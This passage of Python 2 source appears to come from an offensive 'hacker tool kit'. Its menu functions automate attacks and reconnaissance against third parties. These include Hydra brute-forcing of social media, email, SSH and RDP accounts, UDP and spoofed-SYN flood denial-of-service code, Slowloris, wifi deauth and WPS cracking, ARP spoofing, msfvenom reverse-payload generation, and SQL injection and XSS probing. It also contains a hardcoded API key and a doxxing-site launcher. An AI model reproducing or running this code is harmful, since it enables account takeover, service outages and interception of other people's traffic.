" + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", 